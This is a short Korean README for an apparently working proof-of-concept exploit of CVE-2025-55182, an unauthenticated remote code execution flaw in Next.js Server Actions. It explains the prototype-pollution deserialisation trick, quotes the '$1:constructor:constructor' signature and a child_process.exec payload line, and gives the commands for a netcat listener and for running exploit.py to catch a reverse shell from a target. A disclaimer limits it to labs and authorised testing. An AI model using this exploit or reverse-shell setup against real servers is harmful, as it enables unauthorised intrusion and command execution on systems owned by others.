
해커스 더 박스(Hack the Box)에서 오셨을 거라 생각합니다. 그렇다면, 네, 이건 실제로 작동합니다.
CVE-2025-55182에 대한 개념 증명(PoC) 익스플로잇으로, Next.js Server Actions의 인증되지 않은 원격 코드 실행(RCE) 취약점을 대상으로 합니다.
이 익스플로잇은 React Server Components(RSC) multipart 페이로드 역직렬화 중 프로토타입 오염(prototype pollution)을 악용하여 비동기, 비차단 실행 흐름을 통해 Node.js 프로세스에 악성 명령을 주입합니다.
execSync() API 대신 child_process.exec()를 사용합니다.requests 라이브러리만으로 완전히 구축되었습니다.공격 호스트에서 터미널을 열고 들어오는 리버스 연결을 받기 위해 netcat 소켓 리스너를 엽니다:
nc -lvnp 4444
대상 기본 URL, 로컬 호스트 인터페이스 IP, 원하는 리스너 포트를 제공합니다:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
이 스크립트는 필요한 Next-Action 라우팅 헤더와 함께 애플리케이션 라우팅 엔드포인트로 직접 조작된 원시 multipart 페이로드를 전송합니다.
{"get":"$1:constructor:constructor"}를 통한 객체 생성 시그니처를 활용하여 역직렬화 엔진이 네이티브 객체 트리를 오염시킵니다. 동반 매개변수를 처리할 때 악의적으로 삽입된 _response 컨텍스트 블록을 명령 큐로 해석하여 실행 중인 Node 서버 사용자 컨텍스트의 권한으로 코드 실행을 허용합니다.
// 기본 벡터 대상:
process.mainModule.require('child_process').exec('your_payload_here');
이 스크립트는 교육 목적, 승인된 보안 테스트, 그리고 Hack The Box와 같은 랩에서 취약한 플래그를 획득하기 위해서만 엄격히 제작되었습니다. 작성자는 이 유틸리티로 인한 오용, 무단 시스템 침입 또는 손상에 대해 책임을 지지 않습니다.